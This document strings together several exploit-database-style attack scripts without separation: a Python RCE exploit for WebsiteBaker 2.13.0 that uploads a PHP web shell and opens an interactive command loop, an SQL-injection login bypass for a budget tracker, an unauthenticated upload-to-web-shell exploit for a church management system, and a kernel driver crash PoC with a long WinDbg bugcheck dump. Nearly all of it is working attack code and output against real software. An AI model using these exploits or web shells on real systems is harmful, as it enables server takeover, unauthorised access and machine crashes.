# python3 exploit.py -h
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
def main():
parser = argparse.ArgumentParser(
description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
)
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
sleep(2)
find_default(args)
def find_default(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
else:
print("\n[?] Check Adress...\n")
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!\n")
sleep(2)
exit(1)
except requests.ConnectionError as exception:
print("[-] Address not reachable!\n")
sleep(2)
exit(1)
exploit(args)
url = args.host + "/admin/login/index.php"
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/addons/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers)
for cookie in response.cookies:
phpsessid_name = cookie.name
soup = BeautifulSoup(response.text, 'html.parser')
input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value"))
input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value"))
input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name"))
input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value"))
login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)
def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):
session = requests.session()
url = args.host + "/admin/login/index.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}"
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/login/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9", "Connection": "close"
}
data = {
"url": '',
"username_fieldname": input_hidden_username,
"password_fieldname": input_hidden_password,
input_hidden_name: input_hidden_value,
input_hidden_username : args.login,
input_hidden_password : args.password,
"submit": ''
}
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
new_cookie = (response.cookies.get(phpsessid_name))
if response.headers.get("Location") == args.host + "/admin/start/index.php":
print("[+] Success Login...\n")
sleep(2)
check_pers(args, phpsessid_name, new_cookie)
else:
print("[-] Login Failed...\n")
print("Your username or password is incorrect.")
sleep(2)
def check_pers(args, phpsessid_name, new_cookie):
url = args.host + "/admin/languages/install.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name : new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)
soup = BeautifulSoup(response.text, 'html.parser')
if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"):
find_token(args, phpsessid_name, new_cookie)
else:
print("[!] Unauthorized user!\n\n")
print("Requires user with language editing permissions.")
sleep(2)
exit(1)
def find_token(args, phpsessid_name, new_cookie):
url = args.host + "/admin/languages/index.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name : new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)
soup = BeautifulSoup(response.text, 'html.parser')
token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")
if soup.find_all("option")[1].text == "":
exploit(args)
elif soup.find_all("option")[20].text == "Türkçe":
token_lang = soup.find_all("option")[20].get("value")
uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
else:
install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)
pass
def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
url = args.host + "/admin/languages/install.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name: new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/languages/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n"
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'html.parser')
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
print("[!] Installing Vuln Lang File!\n")
sleep(2)
find_token(args, phpsessid_name, new_cookie)
def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):
url = args.host + "/admin/languages/uninstall.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name: new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/languages/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"action": "uninstall",
"advanced": '',
token_hidden_name : token_hidden_value,
"file": token_lang,
"submit": "Uninstall"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'html.parser')
print("[!] Uninstall Lang File!\n")
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
sleep(2)
find_token(args, phpsessid_name, new_cookie)
def exploit(args):
response = requests.get(args.host + "/languages/TR.php?cmd=whoami")
if response.status_code == 200:
print("[*] Exploit File Exists!\n")
sleep(2)
print("[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + "/languages/TR.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
if __name__ == '__main__':
main()
# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
allowing the attacker to login with admin acount
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/expense_budget/admin/login.php
Username: admin' or ''=' --
# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# Exploit Details:
# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
# 2. Set the 'f' parameter of the POST request to 'save'.
# - `Users.php?f=save`
# 3. Capture request in burp and replace with with following request.
'''
POST /church_management/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
Content-Length: 859
Origin: http://localhost
Connection: close
Referer: http://localhost/church_management/admin/?page=user
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="id"
1
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="firstname"
Adminstrator
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="lastname"
Admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="username"
admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="password"
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php echo phpinfo(); ?>
-----------------------------91105564325608762312322546550--
'''
# ` Image uploader is renaming your payload using the following function.
# strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
# you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
# and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
# concate output with your playload name like this 1632085200_phpinfo.php
# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Church Management System v1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
.----------.
.-''-. / /
. __ __ ___ .' .-. ) / ______.'
.'| | |/ `.' `. / .' / / / /_
.' | | .-. .-. ' (_/ / / / '''--.
< | __ __ | | | | | | ,.----------. / / '___ `.
| | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. |
| | \ .' / | \ | / | \ || | | | | |\\ /. ' ) |
| |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' /
| /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'`
| | \ \ / / | |_/ / | |_ / /.-'_.' '------'''
' \ \ \ \ \._,\ '/\ \._,\ '/ / _.'
'------' '---'`--' `" `--' `" ( _.-'
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'uploads/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'img':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}
def id_generator():
x = datetime.datetime.now()
date_string = x.strftime("%y-%m-%d %H:%M")
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
timestamp = datetime.datetime.timestamp(date)
file = int(timestamp)
final_name = str(file)+'_shell.php'
return final_name
filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)
shell_upload = True if("Undefined index: id in" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
# Date: 2021/04/07
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr
import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv
devicename = "GM312Fltr"
ioctl = 0x22245C
ioctl_list = '''
0x22245C
0x222440
0x222441
0x222400
0x222404
0x222408
0x222420
0x222424
0x222448
0x222450
0x22245c
0x222460
'''
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print ("Not Win! Sorry!")
else:
print ("OPENED!")
buf = 'A' * 2000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
[Bugcheck Analysis]
Fatal System Error 0x000000f7
(0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus
fffff807`2e1feb90 cc int 3
0 kd !analyze
Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
........................
Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.
........................................
.............................
Loading User Symbols
.............................................
Loading unloaded module list
........
Bugcheck Analysis
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned. This is the classic buffer overrun
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments
Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2 0000f80736bc1742, Expected security check cookie
Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4 0000000000000000, zero
Debugging Details
------------------
BUGCHECK_CODE f7
BUGCHECK_P1 bebea1caeaf0a2c1
BUGCHECK_P2 f80736bc1742
BUGCHECK_P3 ffff07f8c943e8bd
BUGCHECK_P4 0
PROCESS_NAME pythonw.exe
SYMBOL_NAME GM312Fltr+e1e
MODULE_NAME GM312Fltr
IMAGE_NAME GM312Fltr.sys
FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function
FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d}
Followup MachineOwner
---------
0 kd kb
RetAddr Args to Child Call Site
fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus
fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946
fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107
fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e
fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7
fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297
fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186
fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377
fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76
fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500
fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
